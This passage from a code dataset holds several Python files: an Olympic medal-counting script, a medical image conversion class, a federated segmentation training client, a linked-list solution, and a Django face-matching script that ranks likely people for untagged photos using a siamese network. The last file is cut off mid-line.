required=False)\nparser.add_argument(\"-overall\", type=str, required=False, nargs='*')\nargs = parser.parse_args()\npath = args.path\nmode = args.mode\ncountry = args.country\nyear = args.year\npathOutput = args.output\ncountries = args.overall\n\n#python main.py --path data.tsv --mode medals --country USA --year 1972\n#python main.py --path data.tsv --mode total --year 1972\n\nmedals = []\n\nif (pathOutput != None):\n fileOutput = open(pathOutput, \"w\")\n\n\ndef countMedals(medals):\n gold = 0\n bronze = 0\n silver = 0\n countAthletes = 0\n with open(path, 'r') as file:\n file.readline()\n nextLine = file.readline()\n while nextLine:\n if int(year) not in yearsOlymp:\n print('No olymp this year')\n nextLine = file.readline()\n quit()\n splitLine = nextLine.split('\\t')\n medalLine = splitLine[-1][:-1]\n nameAthlete = splitLine[1]\n countryAthlete = splitLine[-9]\n sportAthlete = splitLine[-3]\n if country in countryAthlete or country in splitLine:\n if year in splitLine:\n while countAthletes < 10:\n if nameAthlete not in names and medalLine != 'NA':\n if (pathOutput != None):\n fileOutput.write(f'{nameAthlete} - {sportAthlete} - {medalLine} \\n')\n print(nameAthlete, \"-\", sportAthlete, \"-\", medalLine)\n countAthletes += 1\n names.append(nameAthlete)\n else:\n break\n\n medals.append(medalLine)\n\n nextLine = file.readline()\n\n for medal in medals:\n if medal == 'Gold':\n gold += 1\n elif medal == 'Silver':\n silver += 1\n elif medal == 'Bronze':\n bronze += 1\n\n if len(names) == 0:\n if (pathOutput != None):\n fileOutput.write('invalid country')\n print('invalid country')\n quit()\n\n if len(medals) < 10:\n if (pathOutput != None):\n fileOutput.write(f'that year {country} had less than 10 medals \\n')\n print('that year', country, 'had less than 10 medals')\n\n return print(f'{gold} gold medals, {silver} silver medals, {bronze} bronze medals, total : {gold + bronze + silver}')\n\n\ndef total_medals(year):\n if int(year) not in yearsOlymp:\n print('No olymp this year')\n quit()\n dict = {}\n with open(path, 'r') as file:\n file.readline()\n line = file.readline()\n while line:\n splitLine = line.split('\\t')\n if year == splitLine[9]:\n if splitLine[-1][:-1] != \"NA\":\n key = splitLine[-9]\n dict.setdefault(key, [])\n if len(dict[key]) == 0:\n dict[key].append(0)\n dict[key].append(0)\n dict[key].append(0)\n medal = splitLine[-1][:-1].lower()\n if medal == \"gold\":\n dict[key][0] += 1\n elif medal == \"silver\":\n dict[key][1] += 1\n elif medal == \"bronze\":\n dict[key][2] += 1\n\n line = file.readline()\n\n\n for key in dict:\n print(key, \" - \", dict[key][0], \" - \", dict[key][1], \" - \", dict[key][2])\n\n return dict\n\n\nnames = []\ncountAthletes = 0\nyearsOlymp = []\n\nfor i in range(1896, 2016, 4):\n yearsOlymp.append(i)\n\n\ndef overallFunc(countries):\n dict = {}\n\n for countryOverall in countries:\n key = countryOverall\n dict.setdefault(key, [])\n dict[key].append([])\n dict[key].append([])\n\n def findIndex(dictionary, needYear, key):\n for countr in dictionary:\n i = 0\n if (countr == key):\n for year in dictionary[countr][0]:\n if needYear == year:\n return i\n i += 1\n\n with open(path, 'r') as file:\n file.readline()\n line = file.readline()\n while line:\n splitLine = line.split('\\t')\n yearOverall = splitLine[9]\n if splitLine[-1][:-1] != \"NA\":\n if splitLine[-9] in countries:\n key = splitLine[-9]\n if yearOverall not in dict[key][0]:\n dict[key][0].append(yearOverall)\n dict[key][1].append(0)\n dict[key][1][findIndex(dict,yearOverall,key)] += 1\n elif yearOverall in dict[key][0]:\n dict[key][1][findIndex(dict,yearOverall,key)] += 1\n\n line = file.readline()\n\n def maxMedals(dictionary):\n for countr in dictionary:\n i = 0\n j = 0\n maxMedal = dictionary[countr][1][0]\n for medal in dictionary[countr][1]:\n if (maxMedal <= medal):\n maxMedal = medal\n j = i\n i+=1\n print(countr,\" max medals in \",dictionary[countr][0][j],\" : \",maxMedal)\n\n return print(maxMedals(dict))\n\ndef interactiveFunc():\n while True:\n dict = {}\n dictCountries = {}\n dictMedals = {}\n\n country = input(\"Input country\")\n with open(path, 'r') as file: # открываем файл на чтение\n file.readline() # читаем заголовочную строку\n line = file.readline() # читаем первую строку с данными\n while line: # пока есть строки в файле\n splitLine = line.split('\\t') # сплит по табу\n if country in splitLine[-9] or country in splitLine[-8]:\n if splitLine[-1][:-1] != \"NA\":\n key = splitLine[9]\n dict.setdefault(key)\n dictCountries.setdefault(key)\n if (dict[key] == None):\n dict[key] = 1\n dictCountries[key] = splitLine[-4]\n else:\n dict[key] += 1\n dictCountries[key] = splitLine[-4]\n\n dictMedals.setdefault(key, [])\n\n if (dictMedals[key] == []):\n dictMedals[key].append(0)\n dictMedals[key].append(0)\n dictMedals[key].append(0)\n\n if splitLine[-1][:-1] == \"Gold\":\n dictMedals[key][0] += 1\n elif splitLine[-1][:-1] == \"Silver\":\n dictMedals[key][1] += 1\n elif splitLine[-1][:-1] == \"Bronze\":\n dictMedals[key][2] += 1\n\n\n line = file.readline()\n\n firstYear = int(key)\n maxYear = key\n countMaxYear = dict[key]\n minYear = key\n countMinYear = dict[key]\n placeOfOlymp = dictCountries[key]\n\n for key in dict:\n if firstYear >= int(key):\n firstYear = int(key)\n placeOfOlymp = dictCountries[key]\n if (dict[key] >= countMaxYear):\n maxYear = key\n countMaxYear = dict[key]\n if (dict[key] <= countMinYear):\n minYear = key\n countMinYear = dict[key]\n\n print(\"First Olymp : \", firstYear, \". Place : \", placeOfOlymp)\n print(\"Max medals Olymp : \", maxYear, \". Count medals : \", countMaxYear)\n print(\"Min medals Olymp : \", minYear, \". Count medals : \", countMinYear)\n\n for key in dictMedals:\n print(key,\" year : \", dictMedals[key][0], \" gold medals, \", dictMedals[key][1], \" silver medals, \",\n dictMedals[key][2], \" bronze medals\")\n\n retry = input(\"Again ? y/n\")\n retry = retry.lower()\n if retry == \"y\":\n continue\n elif retry == \"n\":\n quit()\n else:\n print(\"error\")\n\nif mode == 'total':\n total_medals(year)\nelif mode == \"medals\":\n countMedals(medals)\nelif countries != None:\n overallFunc(countries)\nelif mode == 'interactive':\n interactiveFunc()\n\nif (pathOutput != None):\n fileOutput.write(f'Summary medals : {countMedals(medals)} \\n')\nif (pathOutput != None):\n fileOutput.close()\n","repo_name":"KristinaRiabova/Assignment_7","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"21298840766","text":"import os\nimport numpy as np\nimport SimpleITK as sitk\nfrom .coordsConvert import convertPatient2ImageCoords\n\n\nclass Image:\n def __init__(self):\n self.image = None\n self.imgarray = None\n self.clpts = None\n self.origin = (0., 0., 0.)\n self.spacing = (0., 0., 0.)\n self.basename = \"\"\n\n def load(self, imgpath=None, clpath=None):\n if imgpath == None:\n raise ValueError(\"No file provided\")\n imgreader = sitk.ImageFileReader()\n imgreader.SetFileName(imgpath)\n self.image = imgreader.Execute()\n self.origin = self.image.GetOrigin()\n self.spacing = self.image.GetSpacing()\n self.basename = os.path.basename(imgpath).split(\".\")[0]\n\n if clpath != None:\n self.clpts = np.load(clpath)\n\n def convert_to_array(self):\n if self.image == None:\n raise ValueError(\"No image loaded\")\n self.imgarray = sitk.GetArrayFromImage(self.image)\n\n def convert_to_imagepts(self, dimensions=[64, 64, 64], origin=[0, 0, 0], spacing=[1, 1, 1]):\n if isinstance(self.clpts, type(None)):\n raise ValueError(\n \"use convert_to_array method create an ArrayDict from the loaded centerlines.\"\n )\n self.imgarray = np.zeros(dimensions)\n testarray = []\n for pt in self.clpts:\n img_pt = convertPatient2ImageCoords(pt[::-1], origin, spacing)\n testarray.append(img_pt)\n # self.imgarray[img_pt] = 1\n return np.array(testarray)\n\n def convert_to_image(self):\n if isinstance(self.imgarray, type(None)):\n raise ValueError(\n \"use convert_to_imagepts method create an image mask from the loaded centerlines array.\"\n )\n self.image = sitk.GetImageFromArray(self.imgarray)\n\n def save_image(self, savepath):\n if self.image == None:\n raise ValueError(\"no centerline image.\")\n sitk.WriteImage(self.image, savepath)\n\n def save_imagepts(self, savepath):\n if self.clpts == None:\n raise ValueError(\"no centerline points\")\n np.save(savepath, self.clpts)\n\n def save_labels(self, savedir, basename=None):\n if isinstance(self.imgarray, type(None)):\n raise ValueError(\n \"No image array, use convert_to_array to convert a loaded image into a numpy array\"\n )\n if basename == None:\n basename = self.basename\n min_value = self.imgarray.min()\n max_value = self.imgarray.max()\n for i in range(min_value, max_value + 1):\n if i <= 0:\n continue\n output_array = np.zeros_like(self.imgarray)\n output_array[self.imgarray == i] = 1\n output_image = sitk.GetImageFromArray(output_array)\n output_image.SetOrigin(self.origin)\n output_image.SetSpacing(self.spacing)\n filename = basename + \"_\" + str(i) + \".nii.gz\"\n if savedir[-1] == \"/\":\n filepath = savedir + filename \n else:\n filepath = savedir + \"/\" + filename\n sitk.WriteImage(output_image, filepath)\n print(f'Label {str(i)} --> {filename}')\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"isaiahchua/MeshingScriptsV2","sub_path":"ImageTools/image.py","file_name":"image.py","file_ext":"py","file_size_in_byte":3273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"71"} +{"seq_id":"74746894628","text":"import copy\nimport warnings\nimport torch\nimport torch.nn as nn\nimport torch.optim as optim\nfrom torch import distributed\nfrom collections import defaultdict\nimport numpy as np\nimport random\n\nfrom utils import get_scheduler, set_params\nfrom utils import HardNegativeMining, MeanReduction\nfrom torch.utils.data.distributed import DistributedSampler\nfrom torch.utils import data\nfrom torch.cuda.amp import autocast, GradScaler\n\n\ndef seed_worker(_):\n worker_seed = torch.initial_seed() % 2 ** 32\n np.random.seed(worker_seed)\n random.seed(worker_seed)\n\n\nclass Client:\n\n def __init__(self, client_id, dataset, model, logger, writer, args, batch_size, world_size, rank, num_gpu,\n device=None, disable_ddp=False, **kwargs):\n\n self.id = client_id\n self.dataset = dataset\n self._model = model\n self.device = device\n self.batch_size = batch_size\n self.logger = logger\n self.writer = writer\n self.args = args\n\n if disable_ddp:\n self.loader = data.DataLoader(self.dataset, batch_size=self.batch_size, drop_last=True)\n else:\n if args.random_seed is not None:\n g = torch.Generator()\n g.manual_seed(args.random_seed)\n self.loader = data.DataLoader(self.dataset, batch_size=self.batch_size, worker_init_fn=seed_worker,\n sampler=DistributedSampler(self.dataset, num_replicas=world_size,\n rank=rank),\n num_workers=4 * num_gpu, drop_last=True, pin_memory=True, generator=g)\n else:\n self.loader = data.DataLoader(self.dataset, batch_size=self.batch_size,\n sampler=DistributedSampler(self.dataset, num_replicas=world_size,\n rank=rank),\n num_workers=4 * num_gpu, drop_last=True, pin_memory=True)\n\n self.criterion = nn.CrossEntropyLoss(ignore_index=255, reduction='none')\n self.reduction = HardNegativeMining() if args.hnm else MeanReduction()\n\n if self.args.mixed_precision:\n self.scaler = GradScaler()\n\n def save_bn_stats(self):\n pass\n\n def calc_losses(self, images, labels):\n\n if self.args.model == 'bisenetv2':\n if self.args.output_aux:\n outputs, feat2, feat3, feat4, feat5_4 = self.model(images)\n loss = self.reduction(self.criterion(outputs, labels), labels)\n boost_loss = 0\n boost_loss += self.reduction(self.criterion(feat2, labels), labels)\n boost_loss += self.reduction(self.criterion(feat3, labels), labels)\n boost_loss += self.reduction(self.criterion(feat4, labels), labels)\n boost_loss += self.reduction(self.criterion(feat5_4, labels), labels)\n\n loss_tot = loss + boost_loss\n dict_calc_losses = {'loss': loss, 'boost_loss': boost_loss, 'loss_tot': loss_tot}\n\n else:\n outputs = self.model(images)\n loss_tot = self.reduction(self.criterion(outputs, labels), labels)\n dict_calc_losses = {'loss_tot': loss_tot}\n\n else:\n raise NotImplementedError\n\n return dict_calc_losses, outputs\n\n def handle_grad(self, loss_tot):\n pass\n\n @staticmethod\n def calc_loss_fed(dict_losses):\n return dict_losses\n\n @staticmethod\n def update_metrics(metrics, outputs, labels):\n _, prediction = outputs.max(dim=1)\n labels = labels.cpu().numpy()\n prediction = prediction.cpu().numpy()\n metrics.update(labels, prediction)\n\n @staticmethod\n def print_step_loss(losses, scheduler, logger, step):\n for name, l in losses.items():\n logger.log_metrics({f\"Train_{name}\": l}, step=step)\n if scheduler is not None:\n logger.log_metrics({\"Learning Rate\": scheduler.get_last_lr()[0]}, step=step)\n\n @staticmethod\n def apply_loss_penalties(loss_tot):\n return loss_tot\n\n def clip_grad(self):\n pass\n\n def run_epoch(self, cur_epoch, metrics, optimizer, scheduler=None):\n\n dict_all_epoch_losses = defaultdict(lambda: 0)\n\n self.loader.sampler.set_epoch(cur_epoch)\n\n for cur_step, (images, labels) in enumerate(self.loader):\n\n if self.args.stop_epoch_at_step != -1 and cur_step > self.args.stop_epoch_at_step:\n break\n\n images = images.to(self.device, dtype=torch.float32)\n labels = labels.to(self.device, dtype=torch.long)\n\n optimizer.zero_grad()\n\n if self.args.mixed_precision:\n with autocast():\n dict_calc_losses, outputs = self.calc_losses(images, labels)\n dict_calc_losses['loss_tot'] = self.apply_loss_penalties(dict_calc_losses['loss_tot'])\n self.scaler.scale(dict_calc_losses['loss_tot']).backward()\n else:\n dict_calc_losses, outputs = self.calc_losses(images, labels)\n dict_calc_losses['loss_tot'] = self.apply_loss_penalties(dict_calc_losses['loss_tot'])\n dict_calc_losses['loss_tot'].backward()\n\n self.handle_grad(dict_calc_losses['loss_tot'])\n\n if (cur_step + 1) % self.args.print_interval == 0 and self.args.framework == 'centralized':\n self.print_step_loss(dict_calc_losses, scheduler, self.logger,\n len(self.loader) * cur_epoch + cur_step + 1)\n\n dict_calc_losses = self.calc_loss_fed(dict_calc_losses)\n\n self.clip_grad()\n\n self.scaler.step(optimizer) if self.args.mixed_precision else optimizer.step()\n\n if scheduler is not None:\n scheduler.step()\n\n if self.args.framework == 'federated' and cur_epoch == self.args.num_epochs - 1:\n self.update_metrics(metrics, outputs, labels)\n elif self.args.framework == 'centralized':\n self.update_metrics(metrics, outputs, labels)\n\n if self.args.mixed_precision:\n self.scaler.update()\n\n for name, l in dict_calc_losses.items():\n if type(l) != int:\n dict_all_epoch_losses[name] += l.detach().item()\n else:\n dict_all_epoch_losses[name] += l\n\n self.writer.write(f\"EPOCH {cur_epoch + 1}: ended.\")\n print_string = \"\"\n for name, l in dict_all_epoch_losses.items():\n dict_all_epoch_losses[name] /= len(self.loader)\n print_string += f\"{name}={'%.3f' % dict_all_epoch_losses[name]}, \"\n self.writer.write(print_string)\n\n return dict_all_epoch_losses\n\n def generate_update(self):\n return copy.deepcopy(self.model.state_dict())\n\n def _configure_optimizer(self, params):\n if self.args.optimizer == 'SGD':\n optimizer = optim.SGD(params, lr=self.args.lr, momentum=self.args.momentum,\n weight_decay=self.args.weight_decay, nesterov=self.args.nesterov)\n else:\n optimizer = optim.Adam(params, lr=self.args.lr, weight_decay=self.args.weight_decay)\n scheduler = get_scheduler(self.args, optimizer,\n max_iter=10000 * self.args.num_epochs * len(self.loader))\n return optimizer, scheduler\n\n def handle_log_loss(self, dict_all_epoch_losses, dict_losses_list):\n for n, l in dict_all_epoch_losses.items():\n dict_all_epoch_losses[n] = torch.tensor(l).to(self.device)\n distributed.reduce(dict_all_epoch_losses[n], dst=0)\n if self.args.local_rank == 0:\n dict_losses_list[n].append(dict_all_epoch_losses[n] / distributed.get_world_size())\n return dict_all_epoch_losses, dict_losses_list\n\n def train(self, metrics):\n\n params = set_params(self.model, self.args)\n num_train_samples = len(self.dataset)\n\n optimizer, scheduler = self._configure_optimizer(params)\n\n dict_losses_list = defaultdict(lambda: [])\n self.model.train()\n\n for epoch in range(self.args.num_epochs):\n dict_all_epoch_losses = self.run_epoch(epoch, metrics, optimizer, scheduler)\n dict_all_epoch_losses, dict_losses_list = self.handle_log_loss(dict_all_epoch_losses, dict_losses_list)\n\n metrics.synch(self.device)\n\n if self.args.framework == 'federated':\n update = self.generate_update()\n else:\n update = None\n\n if self.args.local_rank == 0:\n return num_train_samples, update, dict_losses_list\n return num_train_samples, update\n\n def switch_bn_stats_to_test(self, change_momentum=False):\n pass\n\n def reset_bn_momentum(self):\n pass\n\n def subs_bn_stats(self, domain, train_cl_bn_stats):\n pass\n\n def copy_bn_stats(self):\n pass\n\n def test(self, metrics, ret_samples_ids=None, silobn_type=None, train_cl_bn_stats=None, loader=None):\n\n self.model.eval()\n\n # idda diff_dom + idda same_dom standard\n if silobn_type == '' or silobn_type == '_standard':\n self.switch_bn_stats_to_test()\n\n bn_dict_tmp = None\n\n class_loss = 0.0\n ret_samples = []\n\n if loader is None:\n loader = self.loader\n\n with torch.no_grad():\n for i, sample in enumerate(loader):\n\n if self.args.stop_epoch_at_step != -1 and i > self.args.stop_epoch_at_step:\n break\n\n self.writer.write(f'{self}: {i + 1}/{len(loader)}, {round((i + 1) / len(loader) * 100, 2)}%')\n\n if self.args.dataset == 'idda':\n # idda heterogeneous same_dom by_domain\n if self.dataset.return_domain:\n images, labels, domain = sample\n else:\n images, labels = sample\n domain = None\n else:\n images, labels = sample\n\n # idda heterogeneous same_dom by_domain\n if self.args.dataset == 'idda':\n self.subs_bn_stats(domain, train_cl_bn_stats)\n\n if self.args.model == 'bisenetv2':\n original_images, images = images\n else:\n original_images = images\n\n images = images.to(self.device, dtype=torch.float32)\n labels = labels.to(self.device, dtype=torch.long)\n\n outputs = self.model(images, test=True, use_test_resize=self.args.use_test_resize) \\\n if self.args.model == 'bisenetv2' else self.model(images)\n\n loss = self.reduction(self.criterion(outputs, labels), labels)\n class_loss += loss.item()\n\n _, prediction = outputs.max(dim=1)\n labels = labels.cpu().numpy()\n prediction = prediction.cpu().numpy()\n metrics.update(labels, prediction)\n\n if ret_samples_ids is not None and i in ret_samples_ids: # get samples\n ret_samples.append((original_images[0].detach().cpu().numpy(),\n labels[0], prediction[0]))\n\n if bn_dict_tmp is not None:\n self.model.load_state_dict(bn_dict_tmp, strict=False)\n\n metrics.synch(self.device)\n\n class_loss = torch.tensor(class_loss).to(self.device)\n distributed.reduce(class_loss, dst=0)\n\n class_loss = class_loss / distributed.get_world_size() / len(self.loader)\n\n return class_loss, ret_samples\n\n def save_model(self, epochs, path, optimizer, scheduler):\n state = {\n \"epoch\": epochs,\n \"model_state\": self.model.state_dict(),\n \"optimizer_state\": optimizer.state_dict(),\n \"scheduler_state\": scheduler.state_dict()}\n torch.save(state, path)\n return path\n\n def __str__(self):\n return self.id\n\n @property\n def num_samples(self):\n return len(self.dataset)\n\n def len_loader(self):\n return len(self.loader)\n\n @property\n def model(self):\n return self._model\n\n @model.setter\n def model(self, model):\n warnings.warn('The current implementation shares the model among all clients.'\n 'Setting it on one client will effectively modify all clients.')\n self._model = model\n","repo_name":"Erosinho13/FedDrive","sub_path":"src/clients/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":12669,"program_lang":"python","lang":"en","doc_type":"code","stars":37,"dataset":"github-code","pt":"71"} +{"seq_id":"11476483397","text":"# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, val=0, next=None):\n# self.val = val\n# self.next = next\nclass Solution:\n def removeNthFromEnd(self, head: ListNode, n: int) -> ListNode:\n dummy_node = ListNode()\n dummy_node.next = head\n fast, slow = head, dummy_node\n while n > 0:\n fast = fast.next\n n -= 1\n while fast:\n fast = fast.next\n slow = slow.next\n slow.next = slow.next.next\n return dummy_node.next","repo_name":"hongkong9771/LeetCode","sub_path":"Code/0019.删除链表的倒数第N个节点/19. Remove Nth Node From End of List.py","file_name":"19. Remove Nth Node From End of List.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"71"} +{"seq_id":"32764532772","text":"#! /usr/bin/env python\n\nfrom datetime import datetime\nfrom django.conf import settings\nfrom django.core.management.base import BaseCommand\nfrom django.db.models import Count, Q, F\nfrom django.db.models.functions import Abs\nfrom face_manager.models import Person, Face\nfrom filepopulator.models import ImageFile\nfrom scipy import stats\nfrom time import sleep\nfrom torch.autograd import Variable\nfrom torch.utils.data import Dataset, DataLoader\nimport collections\nimport io\nimport numpy as np\nimport os\nimport pickle\nimport random\nimport time\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional\nimport torchvision\n\nclass faceAssigner():\n\n \"\"\"docstring for faceAssigner\"\"\"\n def __init__(self):\n super(faceAssigner, self).__init__()\n\n self.DEBUG=False\n self.USE_MIN_VALUE=True\n if self.USE_MIN_VALUE:\n self.IGN_VALUE = 999\n else:\n self.IGN_VALUE = 0\n\n self.DISTANCE_SIAMESE=True\n self.WEIGHT_THRESH_MAX = 0.6\n self.WEIGHT_THRESH_MIN = 0.4\n\n self.MIN_NUM = 50\n self.NUM_DAYS = 180\n self.NUM_CLOSEST = 50\n self.NUM_TO_AVERAGE = 1\n\n self.bogus_date = datetime(1990, 1, 1) # Very few images before that\n self.bogus_date_utc = time.mktime(self.bogus_date.timetuple())\n self.ignore_person = Person.objects.filter(person_name=settings.SOFT_IGNORE_NAME)[0]\n\n model_dir = '/models/optuna_wts'\n\n self.siam_triplet = self.load_network(os.path.join(model_dir, 'output_37.pkl'))\n \n if False:\n self.clear_unassigned_images()\n\n # Sets self.person_ids\n self.get_filtered_list_of_faces(min_num_faces = self.MIN_NUM)\n # Shouldn't do anything, but double checks that \n # a field is set in the database\n self.doubleCheckFacesTimes()\n # Get earliest date for each person. \n self.known_persons_to_dates()\n\n self.reset_task()\n\n def reset_task(self):\n people = Person.objects.all()\n for p in people:\n p.num_faces = p.face_declared.count()\n p.num_possibilities = p.face_poss1.count() + p.face_poss2.count() + p.face_poss3.count()+ p.face_poss4.count()+ p.face_poss5.count()\n p.num_unverified_faces = p.face_declared.filter(validated=False).count()\n p.save()\n\n def execute(self, redo_all=False):\n \n # Now we want to get each unassigned image\n unassigned_crit = Q(declared_name__person_name=settings.BLANK_FACE_NAME)\n\n if redo_all:\n unassigned = Face.objects.filter(unassigned_crit).order_by('?')\n else:\n no_suggestions = Q(poss_ident1__person_name=None)\n unassigned = Face.objects.filter(unassigned_crit).filter(no_suggestions).order_by('?')\n\n num_unassigned = int(unassigned.count())\n u_idx = 0\n for u_img in unassigned.iterator():\n try:\n print(f\"Assigning: {u_idx+1}/{num_unassigned}\")\n u_idx += 1\n self.classify_unassigned(u_img)\n except Exception as e:\n print(f\"Exception! {e}\")\n\n def load_network(self, net_data_pkl):\n with open(net_data_pkl, 'rb') as fh:\n data = pickle.load(fh)\n\n weight_file = io.BytesIO(data['weight_file_data'])\n weights = torch.load(weight_file, map_location=torch.device('cpu'))\n params = data['params']\n\n n_layers = params['n_layers']\n activation = params['activation']\n layers_sizes = []\n for ii in range(n_layers - 1):\n layers_sizes.append(params[f'n_units_l{ii}'])\n layers_sizes.append(400)\n\n dropouts = []\n for ii in range(n_layers - 1):\n dropouts.append(params[f'dropout_l{ii}'])\n\n net = siameseModel(n_layers, activation, layers_sizes, dropouts, 640, 'triplet')\n net.load_state_dict(weights)\n net.eval()\n\n return net\n\n\n # def compute_distance(self, base, comparisons):\n # base_enc = self.combined_siamese_net(base).unsqueeze(0)\n # cmp_enc = self.combined_siamese_net(comparisons)\n\n # l2_dist = torch.cdist(base_enc, cmp_enc).squeeze(1)\n # return l2_dist\n\n def clear_unassigned_images(self):\n # Only used if I want to reassign all the faces. \n unassigned_crit = Q(declared_name__person_name=settings.BLANK_FACE_NAME)\n proposed = ~Q(poss_ident1=None)\n # proposed = ~Q(weight_1=0)\n num_to_reset = Face.objects.filter(unassigned_crit & proposed).count()\n print(f\"Clearing {num_to_reset} unassigned images...\")\n # Filter and update\n Face.objects.filter(unassigned_crit & proposed).update(poss_ident1=None, \n poss_ident2=None, poss_ident3=None, poss_ident4=None, poss_ident5=None,\n weight_1 = 0, weight_2 = 0, weight_3 = 0, weight_4 = 0, weight_5 = 0, )\n\n Person.objects.all().update(num_possibilities = 0)\n\n return \n\n def get_filtered_list_of_faces(self, min_num_faces):\n\n criterion_ign = ~Q(person_name__in=settings.IGNORED_NAMES)\n criterion_unlikely = Q(further_images_unlikely=False)\n\n assigned_people = Person.objects.annotate(c=Count('face_declared', filter=criterion_ign & criterion_unlikely)).filter(c__gt=min_num_faces)\n\n self.person_ids = [p.id for p in assigned_people]\n\n def known_persons_to_dates(self):\n # Get the dates for all pictures with a given person tagged in\n # them. Also calculate the first (non-bogus) timestamp of the person\n # appearing. \n self.person_to_dates = {}\n for known_id in self.person_ids:\n faces_person = Q(declared_name__id=known_id)\n p = Person.objects.get(id=known_id)\n faces = Face.objects.filter(faces_person).order_by('id')\n face_ids = list(faces.values_list('id', flat=True))\n # face_timestamps = [f.source_image_file.dateTakenUTC for f in faces]\n face_timestamps = list(faces.values_list('dateTakenUTC', flat=True))\n timestamps_sorted = np.sort(face_timestamps).reshape(-1, 1)\n earliest_date_idx = np.where(timestamps_sorted > self.bogus_date_utc)\n timestamps_sorted_nonbogus = timestamps_sorted[earliest_date_idx]\n # Modified Z score\n\n median = np.median(timestamps_sorted_nonbogus, axis=0)\n diff = (timestamps_sorted_nonbogus - median)**2\n diff = np.sqrt(diff)\n med_abs_deviation = np.median(diff)\n\n modified_z_score = 0.6745 * diff / med_abs_deviation\n\n min_idx = np.argmin(modified_z_score)\n modified_z_score = modified_z_score[:min_idx]\n\n # Compute z score as a heuristic to get earliest date\n # z_score = stats.zscore(timestamps_sorted_nonbogus).reshape(-1, 1)\n # Then inter-quartile range\n q1 = np.percentile(modified_z_score, 25)#! /\n q3 = np.percentile(modified_z_score, 75)\n iqr = q3 - q1\n lower_z = q1 - iqr \n upper_z = q3 + iqr \n\n # Get the threshold \n # The modified z score is a parabola, so only get the\n # first half\n thresh_idx = np.where(modified_z_score[:min_idx] > upper_z)[0]\n if len(thresh_idx) > 0:\n thresh_idx = np.max(thresh_idx) + 1\n else:\n thresh_idx = 0\n # Throw in a couple more indices for fun\n idx_add = int(np.ceil(len(face_ids) // 1000))\n # print(known_id)\n # print(upper_z)\n # print(modified_z_score[:10])\n thresh_idx += idx_add\n\n # best_early = np.min(timestamps_sorted_nonbogus[np.where(z_score > -1)])\n earliest_date = timestamps_sorted_nonbogus[thresh_idx]\n\n person_data = {}\n person_data['timestamps'] = face_timestamps\n person_data['face_ids'] = face_ids\n # Unlikely to get images before the first timestamp - or we can\n # declare no images more than x days before the earliest timestamp. \n person_data['first_timestamp'] = earliest_date\n\n date_string = time.strftime('%Y-%m-%d', time.localtime(earliest_date))\n # print(p, '|', date_string, earliest_date)\n\n\n self.person_to_dates[known_id] = person_data\n\n def doubleCheckFacesTimes(self):\n # This one shouldn't do anything, but it's a backup \n # for now.\n faces = Face.objects.filter(dateTakenUTC=0)\n\n count = faces.count()\n # print(f\"Faces found: {count}\")\n\n for idx, face in enumerate(faces.iterator()):\n if idx % 100 == 0:\n print(f'{idx / count * 100:.2f}%')\n date_utc = face.source_image_file.dateTakenUTC\n face.dateTakenUTC = date_utc\n super(Face, face).save()\n\n def classify_unassigned(self, u_img):\n\n date = u_img.source_image_file.dateTaken.timestamp()\n # print(date)\n date_string = time.strftime('%Y-%m-%d', time.localtime(date))\n if self.DEBUG:\n print(u_img.face_thumbnail)\n print(u_img.source_image_file.dateTaken, date)\n\n short_encoding = torch.Tensor(u_img.face_encoding)\n long_encoding = torch.Tensor(u_img.face_encoding_512)\n base_combined = torch.Tensor(np.concatenate((long_encoding, short_encoding)))\n base_enc = self.siam_triplet.feature_fwd(base_combined).unsqueeze(0)\n\n if short_encoding is None or long_encoding is None:\n print(\"Short and/or long encoding not set\")\n return\n\n if u_img.declared_name.person_name != settings.BLANK_FACE_NAME:\n print(\"Already assigned\")\n return\n\n distances_matrix = None\n # dist_per_category = []\n\n N_COMPARISONS=25\n\n comparison_mat = np.ones((len(self.person_ids), N_COMPARISONS)) * 999\n\n s = time.time()\n if u_img.rejected_fields is not None:\n rejected_ids = u_img.rejected_fields\n else:\n rejected_ids = []\n for row_num, known_id in enumerate(self.person_ids):\n \n person = Person.objects.get(id=known_id)\n first_date_person = self.person_to_dates[known_id]['first_timestamp']\n if date < first_date_person and date > self.bogus_date_utc: \n # This person is unlikely to be in this photo\n # dist_per_category.append(9999)\n # print(f'Person {person} is unlikely to be in this image on {date_string}')\n # continue\n pass\n\n elif known_id in rejected_ids:\n pass\n else:\n # Get a number of comparison images from this person, weighted closely\n # temporally. \n faces_person = Q(declared_name__id=known_id)\n has_short = ~Q(face_encoding=None)\n has_long = ~Q(face_encoding_512=None)\n # Annotate - absolute temporal distance of other faces\n # from this face's date (using annotate). \n # Filter by faces with this known ID. \n closest_faces = Face.objects.annotate(result=Abs(F('dateTakenUTC') - date)) \\\n .filter(faces_person & has_short & has_long).order_by('result')\n # Get the N_COMPARISONS closest faces\n closest_faces = closest_faces[:N_COMPARISONS]\n\n short_encs = np.array(closest_faces.values_list('face_encoding', flat=True))\n long_encs = np.array(closest_faces.values_list('face_encoding_512', flat=True))\n cmp_combined = torch.Tensor(np.concatenate((long_encs, short_encs), 1))\n\n # Compute distance with siamese net\n cmp_enc = self.siam_triplet.feature_fwd(cmp_combined)\n l2_dist = torch.cdist(base_enc, cmp_enc).squeeze(1).detach().numpy().reshape(-1)\n l2_dist.sort()\n\n # print(l2_dist)\n comparison_mat[row_num, :len(l2_dist)] = l2_dist\n # print('here')\n if len(l2_dist) < N_COMPARISONS:\n comparison_mat[row_num, len(l2_dist):] = l2_dist[-1]\n # print('here')\n\n # dist_per_category.append(float(torch.min(l2_dist).detach()))\n\n # print(comparison_mat)\n top_votes = np.argmin(comparison_mat, 0)\n vote_counts = np.bincount(top_votes)\n # print(top_votes)\n # print(vote_counts)\n most_votes_ranked = np.argsort(vote_counts)[::-1]\n average_dists = np.mean(comparison_mat, 1)\n\n best_id = self.person_ids[most_votes_ranked[0]]\n first_wt = average_dists[most_votes_ranked[0]]\n person = Person.objects.get(id=best_id)\n if self.DEBUG:\n print(time.time() - s, person, first_wt, len(average_dists), 